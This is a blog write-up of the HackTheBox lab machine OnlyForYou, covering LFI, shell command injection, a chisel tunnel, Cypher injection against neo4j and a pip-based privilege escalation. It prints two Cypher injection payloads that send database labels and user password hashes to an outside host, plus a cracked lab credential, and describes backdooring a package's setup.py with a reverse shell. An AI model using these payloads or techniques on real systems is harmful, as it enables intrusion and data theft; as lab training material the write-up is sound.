<!DOCTYPE html><html lang="en"mode="dark"><!--
  The Head
-->

<head>
  <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"><!-- i18n for `_javascript/utils/timeago.js` -->
    <meta name="day-prompt" content="days ago">
    <meta name="hour-prompt" content="hours ago">
    <meta name="minute-prompt" content="minutes ago">
    <meta name="justnow-prompt" content="just now"><!-- Begin Jekyll SEO tag v2.7.1 -->
<meta name="generator" content="Jekyll v4.2.1" />
<meta property="og:title" content="OnlyForYou - HackTheBox" />
<meta property="og:locale" content="en" />
<meta name="description" content="OnlyForYou is a medium linux box on HackTheBox. It starts with exploiting an LFI vulnerability to leak application source code, which reveals a code injection vulnerability. Once inside the box, you setup a tunnel to a local web app that’s vulnerable to Cypher Injection. Privesc is through a sudo permission on pip3 download." />
<meta property="og:description" content="OnlyForYou is a medium linux box on HackTheBox. It starts with exploiting an LFI vulnerability to leak application source code, which reveals a code injection vulnerability. Once inside the box, you setup a tunnel to a local web app that’s vulnerable to Cypher Injection. Privesc is through a sudo permission on pip3 download." />
<link rel="canonical" href="https://4g3nt47.github.io/posts/hackthebox/only4you.html" />
<meta property="og:url" content="https://4g3nt47.github.io/posts/hackthebox/only4you.html" />
<meta property="og:site_name" content="4g3nt47" />
<meta property="og:type" content="article" />
<meta property="article:published_time" content="2023-08-26T00:00:00+01:00" />
<meta name="twitter:card" content="summary" />
<meta property="twitter:title" content="OnlyForYou - HackTheBox" />
<meta name="twitter:site" content="@UmarAbdoul" />
<meta name="google-site-verification" content="google_meta_tag_verification" />
<script type="application/ld+json">
{"description":"OnlyForYou is a medium linux box on HackTheBox. It starts with exploiting an LFI vulnerability to leak application source code, which reveals a code injection vulnerability. Once inside the box, you setup a tunnel to a local web app that’s vulnerable to Cypher Injection. Privesc is through a sudo permission on pip3 download.","@type":"BlogPosting","url":"https://4g3nt47.github.io/posts/hackthebox/only4you.html","headline":"OnlyForYou - HackTheBox","dateModified":"2023-08-26T00:00:00+01:00","datePublished":"2023-08-26T00:00:00+01:00","mainEntityOfPage":{"@type":"WebPage","@id":"https://4g3nt47.github.io/posts/hackthebox/only4you.html"},"@context":"https://schema.org"}</script>
<!-- End Jekyll SEO tag -->
<title>OnlyForYou - HackTheBox | 4g3nt47
  </title><!--
  The Favicons for Web, Android, Microsoft, and iOS (iPhone and iPad) Apps
  Generated by: https://realfavicongenerator.net/
--><link rel="apple-touch-icon" sizes="180x180" href="/assets/img/favicons/apple-touch-icon.png">
<link rel="icon" type="image/png" sizes="32x32" href="/assets/img/favicons/favicon-32x32.png">
<link rel="icon" type="image/png" sizes="16x16" href="/assets/img/favicons/favicon-16x16.png">
<link rel="manifest" href="/assets/img/favicons/site.webmanifest">
<link rel="shortcut icon" href="/assets/img/favicons/favicon.ico">
<meta name="apple-mobile-web-app-title" content="4g3nt47">
<meta name="application-name" content="4g3nt47">
<meta name="msapplication-TileColor" content="#da532c">
<meta name="msapplication-config" content="/assets/img/favicons/browserconfig.xml">
<meta name="theme-color" content="#ffffff">
<!-- Google Fonts -->
  <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin="anonymous">
  <link rel="dns-prefetch" href="https://fonts.gstatic.com">

  <!-- GA --><!-- Bootstrap -->
  <link rel="stylesheet" href="/assets/css/bootstrap.min.css">

  <!-- Font Awesome -->
  <link rel="stylesheet" href="/assets/css/all.min.css"><!--
  CSS selector for site.
-->

<link rel="stylesheet" href="/assets/css/style.css"><link rel="stylesheet"
    href="/assets/css/bootstrap-toc.min.css"><!-- Manific Popup -->
  <link rel="stylesheet" href="/assets/css/magnific-popup.min.css"><!-- JavaScript -->

  <script src="/assets/js/jquery.min.js"></script>

</head>
<body data-spy="scroll" data-target="#toc"><!--
  The Side Bar
-->

<div id="sidebar" class="d-flex flex-column align-items-end" lang="en">
  <div class="profile-wrapper text-center">
    <div id="avatar">
      <a href="/" alt="avatar" class="mx-auto"><img src="/assets/img/avatar.png" alt="avatar" onerror="this.style.display='none'"></a>
    </div>

    <div class="site-title mt-3">
      <a href="/">4g3nt47</a>
    </div>
    <div class="site-subtitle font-italic">Welcome to my infosec blog</div>

  </div><!-- .profile-wrapper -->

  <ul class="w-100">

    <!-- home -->
    <li class="nav-item">
      <a href="/" class="nav-link">
        <i class="fa-fw fas fa-home ml-xl-3 mr-xl-3 unloaded"></i>
        <span>HOME</span>
      </a>
    </li>
    <!-- the real tabs --><li class="nav-item">
      <a href="/categories/" class="nav-link">
        <i class="fa-fw fas fa-stream ml-xl-3 mr-xl-3 unloaded"></i><span>CATEGORIES</span>
      </a>
    </li> <!-- .nav-item --><li class="nav-item">
      <a href="/tags/" class="nav-link">
        <i class="fa-fw fas fa-tag ml-xl-3 mr-xl-3 unloaded"></i><span>TAGS</span>
      </a>
    </li> <!-- .nav-item --><li class="nav-item">
      <a href="/archives/" class="nav-link">
        <i class="fa-fw fas fa-archive ml-xl-3 mr-xl-3 unloaded"></i><span>ARCHIVES</span>
      </a>
    </li> <!-- .nav-item --><li class="nav-item">
      <a href="/about/" class="nav-link">
        <i class="fa-fw fas fa-info-circle ml-xl-3 mr-xl-3 unloaded"></i><span>ABOUT</span>
      </a>
    </li> <!-- .nav-item --></ul> <!-- ul.nav.flex-column -->

  <div class="sidebar-bottom mt-auto d-flex flex-wrap justify-content-center align-items-center"><a href="https://github.com/4g3nt47" aria-label="github"target="_blank" rel="noopener">
        <i class="fab fa-github"></i>
      </a><a href="https://twitter.com/UmarAbdoul" aria-label="twitter"target="_blank" rel="noopener">
        <i class="fab fa-twitter"></i>
      </a><a href="javascript:location.href = 'mailto:' + ['aufaruq02','gmail.com'].join('@')" aria-label="email">
        <i class="fas fa-envelope"></i>
      </a><a href="/rss/feed.xml" aria-label="rss">
        <i class="fas fa-rss"></i>
      </a></div> <!-- .sidebar-bottom -->

</div><!-- #sidebar -->
<!--
  The Top Bar
-->

<div id="topbar-wrapper" class="row justify-content-center topbar-down">
  <div id="topbar" class="col-11 d-flex h-100 align-items-center justify-content-between">
    <span id="breadcrumb"><span>
            <a href="/">
              Home
            </a>
          </span><span>OnlyForYou - HackTheBox</span></span><!-- endof #breadcrumb -->

    <i id="sidebar-trigger" class="fas fa-bars fa-fw"></i>

    <div id="topbar-title">Post</div>

    <i id="search-trigger" class="fas fa-search fa-fw"></i>
    <span id="search-wrapper" class="align-items-center">
      <i class="fas fa-search fa-fw"></i>
      <input class="form-control" id="search-input" type="search"
        aria-label="search" autocomplete="off" placeholder="Search...">
      <i class="fa fa-times-circle fa-fw" id="search-cleaner"></i>
    </span>
    <span id="search-cancel" >Cancel</span>
  </div>

</div>
<div id="main-wrapper">
      <div id="main">

        <div class="row">

  <!-- core -->
  <div id="core-wrapper" class="col-12 col-lg-11 col-xl-8">
    <div class="post pl-1 pr-1 pl-sm-2 pr-sm-2 pl-md-4 pr-md-4"><!--
  Refactor the HTML structure.
--><!--
  In order to allow a wide table to scroll horizontally,
  we suround the markdown table with `<div class="table-wrapper">` and `</div>`
--><!--
  Fixed kramdown code highlight rendering:
  https://github.com/penibelst/jekyll-compress-html/issues/101
  https://github.com/penibelst/jekyll-compress-html/issues/71#issuecomment-188144901
--><!-- Add attribute 'hide-bullet' to the checkbox list --><!-- images --><!-- Add CDN URL --><!-- Add image path --><!-- lazy-load images <https://github.com/ApoorvSaxena/lozad.js#usage> --><!-- Add SVG placehoder to prevent layout reflow --><!-- Bypass the HTML-proofer test --><!-- Add CDN URL --><!-- Add image path --><!-- lazy-load images <https://github.com/ApoorvSaxena/lozad.js#usage> --><!-- Add SVG placehoder to prevent layout reflow --><!-- Bypass the HTML-proofer test --><!-- Add CDN URL --><!-- Add image path --><!-- lazy-load images <https://github.com/ApoorvSaxena/lozad.js#usage> --><!-- Add SVG placehoder to prevent layout reflow --><!-- Bypass the HTML-proofer test --><!-- Add CDN URL --><!-- Add image path --><!-- lazy-load images <https://github.com/ApoorvSaxena/lozad.js#usage> --><!-- Add SVG placehoder to prevent layout reflow --><!-- Bypass the HTML-proofer test --><!-- Add CDN URL --><!-- Add image path --><!-- lazy-load images <https://github.com/ApoorvSaxena/lozad.js#usage> --><!-- Add SVG placehoder to prevent layout reflow --><!-- Bypass the HTML-proofer test --><!-- Add CDN URL --><!-- Add image path --><!-- lazy-load images <https://github.com/ApoorvSaxena/lozad.js#usage> --><!-- Add SVG placehoder to prevent layout reflow --><!-- Bypass the HTML-proofer test --><!-- Add CDN URL --><!-- Add image path --><!-- lazy-load images <https://github.com/ApoorvSaxena/lozad.js#usage> --><!-- Add SVG placehoder to prevent layout reflow --><!-- Bypass the HTML-proofer test --><!-- Add CDN URL --><!-- Add image path --><!-- lazy-load images <https://github.com/ApoorvSaxena/lozad.js#usage> --><!-- Add SVG placehoder to prevent layout reflow --><!-- Bypass the HTML-proofer test --><!-- Add CDN URL --><!-- Add image path --><!-- lazy-load images <https://github.com/ApoorvSaxena/lozad.js#usage> --><!-- Add SVG placehoder to prevent layout reflow --><!-- Bypass the HTML-proofer test --><!-- Add CDN URL --><!-- Add image path --><!-- lazy-load images <https://github.com/ApoorvSaxena/lozad.js#usage> --><!-- Add SVG placehoder to prevent layout reflow --><!-- Bypass the HTML-proofer test --><!-- Add CDN URL --><!-- Add image path --><!-- lazy-load images <https://github.com/ApoorvSaxena/lozad.js#usage> --><!-- Add SVG placehoder to prevent layout reflow --><!-- Bypass the HTML-proofer test --><!-- Add CDN URL --><!-- Add image path --><!-- lazy-load images <https://github.com/ApoorvSaxena/lozad.js#usage> --><!-- Add SVG placehoder to prevent layout reflow --><!-- Bypass the HTML-proofer test --><!-- Add CDN URL --><!-- Add image path --><!-- lazy-load images <https://github.com/ApoorvSaxena/lozad.js#usage> --><!-- Add SVG placehoder to prevent layout reflow --><!-- Bypass the HTML-proofer test --><!-- Add CDN URL --><!-- Add image path --><!-- lazy-load images <https://github.com/ApoorvSaxena/lozad.js#usage> --><!-- Add SVG placehoder to prevent layout reflow --><!-- Bypass the HTML-proofer test --><!-- Add CDN URL --><!-- Add image path --><!-- lazy-load images <https://github.com/ApoorvSaxena/lozad.js#usage> --><!-- Add SVG placehoder to prevent layout reflow --><!-- Bypass the HTML-proofer test --><!-- Add CDN URL --><!-- Add image path --><!-- lazy-load images <https://github.com/ApoorvSaxena/lozad.js#usage> --><!-- Add SVG placehoder to prevent layout reflow --><!-- Bypass the HTML-proofer test --><!-- Add CDN URL --><!-- Add image path --><!-- lazy-load images <https://github.com/ApoorvSaxena/lozad.js#usage> --><!-- Add SVG placehoder to prevent layout reflow --><!-- Bypass the HTML-proofer test --><!-- Add CDN URL --><!-- Add image path --><!-- lazy-load images <https://github.com/ApoorvSaxena/lozad.js#usage> --><!-- Add SVG placehoder to prevent layout reflow --><!-- Bypass the HTML-proofer test --><!-- Add CDN URL --><!-- Add image path --><!-- lazy-load images <https://github.com/ApoorvSaxena/lozad.js#usage> --><!-- Add SVG placehoder to prevent layout reflow --><!-- Bypass the HTML-proofer test --><!-- Add CDN URL --><!-- Add image path --><!-- lazy-load images <https://github.com/ApoorvSaxena/lozad.js#usage> --><!-- Add SVG placehoder to prevent layout reflow --><!-- Bypass the HTML-proofer test --><!-- Add CDN URL --><!-- Add image path --><!-- lazy-load images <https://github.com/ApoorvSaxena/lozad.js#usage> --><!-- Add SVG placehoder to prevent layout reflow --><!-- Bypass the HTML-proofer test --><!-- Add CDN URL --><!-- Add image path --><!-- lazy-load images <https://github.com/ApoorvSaxena/lozad.js#usage> --><!-- Add SVG placehoder to prevent layout reflow --><!-- Bypass the HTML-proofer test --><!-- Add CDN URL --><!-- Add image path --><!-- lazy-load images <https://github.com/ApoorvSaxena/lozad.js#usage> --><!-- Add SVG placehoder to prevent layout reflow --><!-- Bypass the HTML-proofer test --><!-- Add CDN URL --><!-- Add image path --><!-- lazy-load images <https://github.com/ApoorvSaxena/lozad.js#usage> --><!-- Add SVG placehoder to prevent layout reflow --><!-- Bypass the HTML-proofer test --><!-- Add CDN URL --><!-- Add image path --><!-- lazy-load images <https://github.com/ApoorvSaxena/lozad.js#usage> --><!-- Add SVG placehoder to prevent layout reflow --><!-- Bypass the HTML-proofer test --><!-- Add CDN URL --><!-- Add image path --><!-- lazy-load images <https://github.com/ApoorvSaxena/lozad.js#usage> --><!-- Add SVG placehoder to prevent layout reflow --><!-- Bypass the HTML-proofer test --><!-- Add CDN URL --><!-- Add image path --><!-- lazy-load images <https://github.com/ApoorvSaxena/lozad.js#usage> --><!-- Add SVG placehoder to prevent layout reflow --><!-- Bypass the HTML-proofer test --><!-- Add CDN URL --><!-- Add image path --><!-- lazy-load images <https://github.com/ApoorvSaxena/lozad.js#usage> --><!-- Add SVG placehoder to prevent layout reflow --><!-- Bypass the HTML-proofer test --><!-- Add CDN URL --><!-- Add image path --><!-- lazy-load images <https://github.com/ApoorvSaxena/lozad.js#usage> --><!-- Add SVG placehoder to prevent layout reflow --><!-- Bypass the HTML-proofer test --><!-- Add CDN URL --><!-- Add image path --><!-- lazy-load images <https://github.com/ApoorvSaxena/lozad.js#usage> --><!-- Add SVG placehoder to prevent layout reflow --><!-- Bypass the HTML-proofer test --><!-- Add CDN URL --><!-- Add image path --><!-- lazy-load images <https://github.com/ApoorvSaxena/lozad.js#usage> --><!-- Add SVG placehoder to prevent layout reflow --><!-- Bypass the HTML-proofer test --><!-- Add CDN URL --><!-- Add image path --><!-- lazy-load images <https://github.com/ApoorvSaxena/lozad.js#usage> --><!-- Add SVG placehoder to prevent layout reflow --><!-- Bypass the HTML-proofer test --><!-- Add CDN URL --><!-- Add image path --><!-- lazy-load images <https://github.com/ApoorvSaxena/lozad.js#usage> --><!-- Add SVG placehoder to prevent layout reflow --><!-- Bypass the HTML-proofer test --><!-- Add CDN URL --><!-- Add image path --><!-- lazy-load images <https://github.com/ApoorvSaxena/lozad.js#usage> --><!-- Add SVG placehoder to prevent layout reflow --><!-- Bypass the HTML-proofer test --><!-- Add CDN URL --><!-- Add image path --><!-- lazy-load images <https://github.com/ApoorvSaxena/lozad.js#usage> --><!-- Add SVG placehoder to prevent layout reflow --><!-- Bypass the HTML-proofer test --><!-- Add CDN URL --><!-- Add image path --><!-- lazy-load images <https://github.com/ApoorvSaxena/lozad.js#usage> --><!-- Add SVG placehoder to prevent layout reflow --><!-- Bypass the HTML-proofer test --><!-- Add CDN URL --><!-- Add image path --><!-- lazy-load images <https://github.com/ApoorvSaxena/lozad.js#usage> --><!-- Add SVG placehoder to prevent layout reflow --><!-- Bypass the HTML-proofer test --><!-- Add CDN URL --><!-- Add image path --><!-- lazy-load images <https://github.com/ApoorvSaxena/lozad.js#usage> --><!-- Add SVG placehoder to prevent layout reflow --><!-- Bypass the HTML-proofer test --><!-- Add header for code snippets --><!-- Create heading anchors --><!-- return -->

<h1 data-toc-skip>OnlyForYou - HackTheBox</h1>

<div class="post-meta text-muted">

  <!-- author -->
  <div>By
    <em><a href="https://twitter.com/UmarAbdoul">Umar Abdul</a></em>
  </div>

  <div class="d-flex">
    <div>
      <!-- published date -->
      <span>
        Posted<!--
  Date format snippet
  See: ${JS_ROOT}/utils/timeago.js
--><em class="timeago"
    date="2023-08-26 00:00:00 +0100"data-toggle="tooltip"
      data-placement="bottom"
      title="Sat, Aug 26, 2023, 12:00 AM +0100">Aug 26</em>
</span>

      <!-- lastmod date --><!-- read time --><!--
  Calculate the post's reading time, and display the word count in tooltip
 --><!-- words per minute  --><!-- return element -->
<span class="readtime" data-toggle="tooltip" data-placement="bottom"
  title="1181 words">
  <em>6 min</em> read</span>
<!-- page views --></div>

  </div> <!-- .d-flex -->

</div> <!-- .post-meta -->

<div class="post-content">
  <p><strong>OnlyForYou</strong> is a medium linux box on <em>HackTheBox</em>. It starts with exploiting an LFI vulnerability to leak application source code, which reveals a code injection vulnerability. Once inside the box, you setup a tunnel to a local web app that’s vulnerable to <em>Cypher Injection</em>. Privesc is through a sudo permission on <code class="language-plaintext highlighter-rouge">pip3 download</code>.</p>

<h3 id="info">Info<a href="#info" class="anchor"><i class="fas fa-hashtag"></i></a></h3></h3>
<p><br /></p>

<p><img data-src="/assets/img/Pasted image 20230819232132.png" alt="" data-proofer-ignore></p>

<p><img data-src="/assets/img/Pasted image 20230819232206.png" alt="" data-proofer-ignore></p>

<p><br /></p>

<h3 id="recon">Recon<a href="#recon" class="anchor"><i class="fas fa-hashtag"></i></a></h3></h3>
<p><br /></p>

<h4 id="nmap">NMAP<a href="#nmap" class="anchor"><i class="fas fa-hashtag"></i></a></h4></h4>
<p><br /></p>

<div class="language-plaintext highlighter-rouge"><div class="code-header"><span label-text="Plaintext"><i class="fas fa-code small"></i></span><button aria-label="copy" title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
</pre></td><td class="rouge-code"><pre># Nmap 7.80 scan initiated Sat Aug 19 12:04:50 2023 as: nmap -sC -sV -oN nmap.txt -v 10.10.11.210
Nmap scan report for 10.10.11.210
Host is up (0.39s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    nginx 1.18.0 (Ubuntu)
| http-methods: 
|_  Supported Methods: POST OPTIONS
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://only4you.htb/
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Aug 19 12:06:02 2023 -- 1 IP address (1 host up) scanned in 72.40 seconds
</pre></td></tr></tbody></table></code></div></div>

<p><br /></p>

<h4 id="web">Web<a href="#web" class="anchor"><i class="fas fa-hashtag"></i></a></h4></h4>
<p><br /></p>

<p>NMAP showed port 80 is redirecting to <code class="language-plaintext highlighter-rouge">http://only4you.htb</code>, so I added it to my <code class="language-plaintext highlighter-rouge">/etc/hosts</code> file;</p>

<p><img data-src="/assets/img/Pasted image 20230819232903.png" alt="" data-proofer-ignore></p>

<p>Most of the links in the page are dead, but there is a contact-us form at the bottom;</p>

<p><img data-src="/assets/img/Pasted image 20230819233021.png" alt="" data-proofer-ignore></p>

<p>Filling the form and clicking the send button generated a POST request;</p>

<p><img data-src="/assets/img/Pasted image 20230819233313.png" alt="" data-proofer-ignore></p>

<p>Tampering with the parameters a little showed an error, which confirms the server is processing the request;</p>

<p><img data-src="/assets/img/Pasted image 20230819233445.png" alt="" data-proofer-ignore></p>

<p>The FAQ section linked to another subdomain, <code class="language-plaintext highlighter-rouge">beta.only4you.htb</code>;</p>

<p><img data-src="/assets/img/Pasted image 20230819233716.png" alt="" data-proofer-ignore></p>

<p><img data-src="/assets/img/Pasted image 20230819233827.png" alt="" data-proofer-ignore></p>

<p>The <em>Source Code</em> button links to <code class="language-plaintext highlighter-rouge">http://beta.only4you.htb/source</code>, which start a download for <code class="language-plaintext highlighter-rouge">source.zip</code>. The source code of the web app is found inside (it’s a flask web app);</p>

<p><img data-src="/assets/img/Pasted image 20230819234154.png" alt="" data-proofer-ignore></p>

<p>Nothing of interest was found in the implementation of both image conversion and resizing featured by the site. Further look revealed a function named <code class="language-plaintext highlighter-rouge">download()</code> that handles POST requests to the <code class="language-plaintext highlighter-rouge">/download</code> route. This function is vulnerable to LFI through the <code class="language-plaintext highlighter-rouge">image</code> parameter;</p>

<p><img data-src="/assets/img/Pasted image 20230819234721.png" alt="" data-proofer-ignore></p>

<p><img data-src="/assets/img/Pasted image 20230819235052.png" alt="" data-proofer-ignore></p>

<hr />

<p><br /></p>

<h3 id="foothold">Foothold<a href="#foothold" class="anchor"><i class="fas fa-hashtag"></i></a></h3></h3>
<p><br /></p>

<p>We already have the source code of <code class="language-plaintext highlighter-rouge">beta.only4you.htb</code>, but not that of the main domain <code class="language-plaintext highlighter-rouge">only4you.htb</code>. Since the sites are running behind <em>Nginx</em> as indicated in the <em>server</em> response header, I read the default <em>Nginx</em> config file at <code class="language-plaintext highlighter-rouge">/etc/nginx/sites-enabled/default</code>, which revealed the web root of <code class="language-plaintext highlighter-rouge">only4you.htb</code>;</p>

<p><img data-src="/assets/img/Pasted image 20230819235544.png" alt="" data-proofer-ignore></p>

<p>Since <code class="language-plaintext highlighter-rouge">beta.only4you.htb</code> is a flask app, I checked for <code class="language-plaintext highlighter-rouge">app.py</code> in the web root of <code class="language-plaintext highlighter-rouge">only4you.htb</code>, and it exists. The <code class="language-plaintext highlighter-rouge">app.py</code> file imported <code class="language-plaintext highlighter-rouge">sendmessage</code> from a module named <code class="language-plaintext highlighter-rouge">form</code> (<code class="language-plaintext highlighter-rouge">form.py</code>), which was also dumped;</p>

<p><img data-src="/assets/img/Pasted image 20230820000138.png" alt="" data-proofer-ignore></p>

<p><img data-src="/assets/img/Pasted image 20230820000422.png" alt="" data-proofer-ignore></p>

<p><img data-src="/assets/img/Pasted image 20230820000332.png" alt="" data-proofer-ignore></p>

<p>Notice how the <code class="language-plaintext highlighter-rouge">issecure()</code> function is using a loose regex to filter the email address, before passing the domain part (everything after <code class="language-plaintext highlighter-rouge">@</code>) to a <code class="language-plaintext highlighter-rouge">subprocess.run()</code>, which is used for executing shell command. This makes it vulnerable to <em>code injection</em>, which I exploited to gain a shell on the box as the user <code class="language-plaintext highlighter-rouge">www-data</code>;</p>

<p><img data-src="/assets/img/Pasted image 20230820000947.png" alt="" data-proofer-ignore></p>

<p><img data-src="/assets/img/Pasted image 20230820001024.png" alt="" data-proofer-ignore></p>

<hr />

<p><br /></p>

<h3 id="user">User<a href="#user" class="anchor"><i class="fas fa-hashtag"></i></a></h3></h3>
<p><br /></p>

<p>There are <strong>2</strong> user accounts on the box;</p>

<div class="language-plaintext highlighter-rouge"><div class="code-header"><span label-text="Plaintext"><i class="fas fa-code small"></i></span><button aria-label="copy" title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
</pre></td><td class="rouge-code"><pre>www-data@only4you:/dev/shm$ cat /etc/passwd | grep 'sh$'
root:x:0:0:root:/root:/bin/bash
john:x:1000:1000:john:/home/john:/bin/bash
neo4j:x:997:997::/var/lib/neo4j:/bin/bash
dev:x:1001:1001::/home/dev:/bin/bash
www-data@only4you:/dev/shm$ 
</pre></td></tr></tbody></table></code></div></div>

<p>Some Interesting service running locally;</p>

<div class="language-plaintext highlighter-rouge"><div class="code-header"><span label-text="Plaintext"><i class="fas fa-code small"></i></span><button aria-label="copy" title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
</pre></td><td class="rouge-code"><pre>www-data@only4you:~/only4you.htb$ ss -ltn
State   Recv-Q  Send-Q        Local Address:Port    Peer Address:Port  Process  
LISTEN  0       151               127.0.0.1:3306         0.0.0.0:*              
LISTEN  0       511                 0.0.0.0:80           0.0.0.0:*              
LISTEN  0       4096          127.0.0.53%lo:53           0.0.0.0:*              
LISTEN  0       128                 0.0.0.0:22           0.0.0.0:*              
LISTEN  0       4096              127.0.0.1:3000         0.0.0.0:*              
LISTEN  0       2048              127.0.0.1:8001         0.0.0.0:*              
LISTEN  0       70                127.0.0.1:33060        0.0.0.0:*              
LISTEN  0       50       [::ffff:127.0.0.1]:7474               *:*              
LISTEN  0       128                    [::]:22              [::]:*              
LISTEN  0       4096     [::ffff:127.0.0.1]:7687               *:*              
www-data@only4you:~/only4you.htb$
</pre></td></tr></tbody></table></code></div></div>

<p>So I uploaded <code class="language-plaintext highlighter-rouge">chisel</code> and setup a reverse tunnel for port <code class="language-plaintext highlighter-rouge">3000</code> and <code class="language-plaintext highlighter-rouge">8001</code>;</p>

<p><img data-src="/assets/img/Pasted image 20230820002041.png" alt="" data-proofer-ignore></p>

<p>This opens up port <code class="language-plaintext highlighter-rouge">3000</code> and <code class="language-plaintext highlighter-rouge">8001</code> on my box and proxied them to the box through the reverse connection. Loading up port <code class="language-plaintext highlighter-rouge">3000</code> showed an instance of <em>Gogs</em>;</p>

<p><img data-src="/assets/img/Pasted image 20230820002330.png" alt="" data-proofer-ignore></p>

<p>Port <code class="language-plaintext highlighter-rouge">8001</code> seems to be hosting some custom web app;</p>

<p><img data-src="/assets/img/Pasted image 20230820002422.png" alt="" data-proofer-ignore></p>

<p>Trying some common defaults, I got in using <code class="language-plaintext highlighter-rouge">admin:admin</code>;</p>

<p><img data-src="/assets/img/Pasted image 20230820002518.png" alt="" data-proofer-ignore></p>

<p>The <em>employees</em> tab has a search feature that throws a <strong>500</strong> error after adding a single quote in the search query;</p>

<p><img data-src="/assets/img/Pasted image 20230820002709.png" alt="" data-proofer-ignore></p>

<p><img data-src="/assets/img/Pasted image 20230820002826.png" alt="" data-proofer-ignore></p>

<p>This indicates a possible SQL injection, so I passed it to <code class="language-plaintext highlighter-rouge">sqlmap</code>, which flag it as vulnerable, but was not able to detect the type of database management system (DBMS) in use;</p>

<p><img data-src="/assets/img/Pasted image 20230820003426.png" alt="" data-proofer-ignore></p>

<p>The payload looks like a MySQL query to me, but supplying it using the <code class="language-plaintext highlighter-rouge">--dbms=MySQL</code> flag didn’t work. There is a checklist in the dashboard that might explain this;</p>

<p><img data-src="/assets/img/Pasted image 20230820004015.png" alt="" data-proofer-ignore></p>

<p>The <em>neo4j’s</em> equivalent of <em>SQL injection</em> is called <em>Cypher Injection</em>. Using the cheatsheet at <a href="https://book.hacktricks.xyz/pentesting-web/sql-injection/cypher-injection-neo4j">hacktricks</a>, I was able to dump available labels with the OOB payload;</p>
<div class="language-plaintext highlighter-rouge"><div class="code-header"><span label-text="Plaintext"><i class="fas fa-code small"></i></span><button aria-label="copy" title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre></td><td class="rouge-code"><pre>' RETURN 0 as _0 UNION CALL db.labels() yield label LOAD CSV FROM 'http://10.10.16.73/?l='+label as l RETURN 0 as _0 //
</pre></td></tr></tbody></table></code></div></div>

<p><img data-src="/assets/img/Pasted image 20230824083333.png" alt="" data-proofer-ignore></p>

<p>The <code class="language-plaintext highlighter-rouge">user</code> label looks interesting. Dumping it with the payload;</p>
<div class="language-plaintext highlighter-rouge"><div class="code-header"><span label-text="Plaintext"><i class="fas fa-code small"></i></span><button aria-label="copy" title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre></td><td class="rouge-code"><pre>a' OR 1=1 WITH 1 as a MATCH (f:user) UNWIND keys(f) as p LOAD CSV FROM 'http://10.10.16.73/?' + p +'='+toString(f[p]) as l RETURN 0 as _0 //
</pre></td></tr></tbody></table></code></div></div>

<p>I got the hash of <strong>2</strong> users;</p>

<p><img data-src="/assets/img/Pasted image 20230824083518.png" alt="" data-proofer-ignore></p>

<p>This looks like a SHA256 hash. We already know the password of <code class="language-plaintext highlighter-rouge">admin</code>, so no need to crack it. Saving the hash of <code class="language-plaintext highlighter-rouge">john</code> into a file, I was able to crack it using <em>John the Ripper</em>;</p>

<p><img data-src="/assets/img/Pasted image 20230824083815.png" alt="" data-proofer-ignore></p>

<p>Local user <code class="language-plaintext highlighter-rouge">john</code> exists on the box, so I tried to login over SSH, and it worked;</p>

<p><img data-src="/assets/img/Pasted image 20230824084039.png" alt="" data-proofer-ignore></p>

<hr />

<p><br /></p>

<h3 id="privesc">PrivEsc<a href="#privesc" class="anchor"><i class="fas fa-hashtag"></i></a></h3></h3>
<p><br /></p>

<p><strong>john</strong> has a <code class="language-plaintext highlighter-rouge">sudo</code> permission configured;</p>

<p><img data-src="/assets/img/Pasted image 20230820012935.png" alt="" data-proofer-ignore></p>

<p>The <code class="language-plaintext highlighter-rouge">download</code> argument is used to tell <code class="language-plaintext highlighter-rouge">pip</code> to download and install a python package. This is interesting as this could allow for a straightforward RCE, but we must supply a link that starts with <code class="language-plaintext highlighter-rouge">http://127.0.0.1:3000/</code> and ends with <code class="language-plaintext highlighter-rouge">.tar.gz</code>. <em>Gogs</em> is already running on this port. Trying the creds of <code class="language-plaintext highlighter-rouge">john:ThisIs4You</code> allowed me to login;</p>

<p><img data-src="/assets/img/Pasted image 20230820013418.png" alt="" data-proofer-ignore></p>

<p>The <code class="language-plaintext highlighter-rouge">Test</code> repo is private, and has nothing of interest. However, we could exploit the <code class="language-plaintext highlighter-rouge">sudo</code> perm by uploading a backdoored python package on the repo, make the repo public so it can be directly accessed externally, and then pass the direct URL to the call to <code class="language-plaintext highlighter-rouge">sudo pip3 download &lt;url&gt;</code>.</p>

<p>I got a minimal python package with no dependencies (which is important as HTB boxes are not connected to the internet, which will be required to resolve unmet dependencies) at <a href="https://pypi.org/project/hello-world-20200509/">pypi</a>. I extracted the archive with;</p>

<p><img data-src="/assets/img/Pasted image 20230820014206.png" alt="" data-proofer-ignore></p>

<p>Our file of interest is <code class="language-plaintext highlighter-rouge">setup.py</code>, which is what will be executed during installation. I edited it and add a bash reverse shell;</p>

<p><img data-src="/assets/img/Pasted image 20230820014345.png" alt="" data-proofer-ignore></p>

<p>I then packaged it back as <code class="language-plaintext highlighter-rouge">backdoored.tar.gz</code> and upload it to the <code class="language-plaintext highlighter-rouge">Test</code> repo;</p>

